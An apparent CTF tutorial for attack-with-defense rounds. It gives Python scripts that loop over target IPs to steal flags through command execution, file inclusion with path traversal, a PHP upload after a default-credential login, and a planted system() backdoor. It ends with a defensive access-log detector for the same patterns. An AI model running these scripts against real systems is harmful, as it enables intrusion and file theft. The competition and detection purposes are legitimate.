In AWD competitions scoring is per round: once you have found a vulnerability you can keep scoring on it in bulk, round after round. To keep scoring you need to be able to maintain access and to fetch flags in batch. This article records how to batch-fetch the flags for the vulnerabilities covered in the previous article.
01 Python (language used)
Python is a cross-platform programming language. It is an object-oriented, dynamically typed language that was originally designed for writing automation scripts (shell scripting); as versions were updated and new language features added, it became more and more widely used for large, independent projects. Writing the batch scripts below requires a working knowledge of Python.
02 Batch scripts per vulnerability
Command execution
POST parameter; vulnerability point
import requests

# ip.txt holds the target hosts, one per line
data = {"shell": 'cat /flag'}
with open('ip.txt', 'r') as f:
    for i in f.readlines():
        url = 'http://' + i.strip() + '/footer.php'
        r = requests.post(url, data=data)
        x = r.text
        print(url + ' ' + x)
File inclusion
GET parameter; vulnerability point
Two ways of writing it are listed
# Regex matching
import re
import requests

f = open('ip.txt', 'r')
for i in f.readlines():
    url = 'http://' + i.strip()
    path = '/about.php?file=/flag'
    payload = url + path
    r = requests.get(payload)
    # the flag is a 32-character token; re.search returns None when nothing matches,
    # so the match object must be checked before calling .group()
    result = re.search('[a-z0-9]{32}', r.text)
    if r.status_code == 200 and result:
        print(url, result.group())
    else:
        print(url, "There is no flag here")
f.close()
# Slicing
import requests

f = open('ip.txt', 'r')
for i in f.readlines():
    url = 'http://' + i.strip()
    url_path = '/about.php?file=../../../../../../../flag'
    payload = url + url_path
    r = requests.get(payload)
    # take the first line of the response body and cut it off at the first HTML tag
    lines = r.text.split('\n')
    print(url + ' ' + lines[0].split('<')[0])
f.close()
File upload
Vulnerability point
import requests

f = open('ip.txt', 'r')
for i in f.readlines():
    URL = 'http://' + i.strip()
    url_path = '/login.php'
    url_path1 = '/admin/upload.php'
    url = URL + url_path
    user_passwd = {'username': 'admin',
                   'password': 'mysql',
                   'button': 'SIGN-I', }
    s = requests.Session()          # a Session keeps the login cookie for the upload request
    r = s.post(url, data=user_passwd)
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', }
    file = {
        # '2.php' is the file name sent to the server and a.php the local file being uploaded;
        # 'pic' must also be changed to match the form field, i.e.
        # Content-Disposition: form-data; name="pic"; filename="php_mmr.php".
        # The third tuple element is the part's Content-Type (requests' (filename, fileobj, content_type) form).
        'pic': ('2.php', open('a.php', 'rb'), 'image/jpeg'),
    }
    url = URL + url_path1
    r1 = s.post(url=url, files=file, headers=header)
    r1.encoding = r1.apparent_encoding
    if r1.status_code != 200:
        print(url + ' \033[1;31m上传失败\033[0m')
    else:
        for line in r1.text.split('\n'):
            # the server's own success message is matched verbatim
            if '上传成功' in line:
                print(url + ' \033[1;32m上传成功\033[0m ' + line)
                break
f.close()
Using a pre-planted backdoor file
import requests

f = open('ip.txt', 'r')
for i in f.readlines():
    url = 'http://' + i.strip()
    url_path = '/a.php?c=system("cat /flag");'
    r = requests.get(url + url_path)
    # first line of the response, cut off at the first HTML tag
    lines = r.text.split('\n')
    print(url + ' ' + lines[0].split('<')[0])
f.close()
fopen vulnerability
import re
import requests

f = open('ip.txt', 'r')
for i in f.readlines():
    url = 'http://' + i.strip()
    path = '/contact.php?path=/flag'
    payload = url + path
    r = requests.get(payload)
    x = r.text
    result = re.search('[a-z0-9]{32}', x)
    # result is None when the response contains no flag-like token
    print(url, result.group() if result else "There is no flag here")
f.close()
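In AWD the boxes you score on are also being hit by every other team with scripts just like the ones above, so the defending half of the game is recognising these batch requests in your own web server's access log. The following detection script is an added example, not code from the original post: it parses Apache combined-format access log lines and flags requests that match the exploit patterns shown above (a `file=` or `path=` parameter pointing straight at `/flag`, `../` traversal, a PHP call such as `system(` carried in the `c=` parameter, and any POST to `/footer.php`, whose body is not visible in the access log). The log lines, source IPs and timestamps are constructed for the example; only the endpoint and parameter names come from the post.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Apache "combined" format: ip - - [time] "METHOD target HTTP/x.y" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def _rules():
    """Detection rules, each a predicate over (method, path, decoded query pairs)."""
    def flag_read(method, path, params):
        # file=/flag or path=/flag: a parameter that is exactly an absolute path to the flag
        return any(re.fullmatch(r'/+flag', v) for _, v in params)

    def traversal(method, path, params):
        # ../../../flag style directory traversal in any parameter value
        return any('../' in v for _, v in params)

    def code_injection(method, path, params):
        # c=system("cat /flag"); -> a PHP execution function carried in a parameter
        return any(re.search(r'\b(system|exec|passthru|shell_exec)\s*\(', v) for _, v in params)

    def footer_post(method, path, params):
        # the command-execution endpoint is driven by a POST body the access log does not record,
        # so every POST to it is flagged for review
        return method == 'POST' and path.endswith('/footer.php')

    return [('flag_read', flag_read), ('traversal', traversal),
            ('code_injection', code_injection), ('footer_post', footer_post)]


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    # parse_qsl already decodes one layer of percent-encoding; the extra unquote
    # also normalises double-encoded values such as %252e%252e%252f
    params = [(k, unquote(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return {'ip': m['ip'], 'method': m['method'], 'path': unquote(parts.path),
            'params': params, 'status': int(m['status'])}


def detect(lines):
    """Return a list of (ip, rule_name, path) alerts, one per matching rule per line."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pred in _rules():
            if pred(rec['method'], rec['path'], rec['params']):
                alerts.append((rec['ip'], name, rec['path']))
    return alerts


def by_source(alerts):
    """Count alerts per source IP: a scripted attacker sweeps every endpoint from one address."""
    counts = {}
    for ip, _, _ in alerts:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample log lines (not real traffic); IPs and timestamps are made up for the example.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /about.php?file=/flag HTTP/1.1" 200 64 "-" "python-requests/2.31"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /about.php?file=..%2F..%2F..%2Fflag HTTP/1.1" 200 64 "-" "python-requests/2.31"',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /a.php?c=system(%22cat%20/flag%22); HTTP/1.1" 200 40 "-" "python-requests/2.31"',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /footer.php HTTP/1.1" 200 40 "-" "python-requests/2.31"',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /contact.php?path=/flag HTTP/1.1" 200 64 "-" "python-requests/2.31"',
    '192.168.1.20 - - [01/Jan/2024:10:00:06 +0000] "GET /about.php?file=team.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    found = detect(SAMPLE_LOG)
    for ip, rule, path in found:
        print(f'{ip} {rule} {path}')
    print(by_source(found))
```

Run against the sample, the five requests from 10.0.0.7 each trigger exactly one rule and the two ordinary requests from 192.168.1.20 trigger none; in a live round the per-source count from `by_source` is the quickest way to see which team is sweeping your box, and the rule names tell you which of the endpoints above still needs patching.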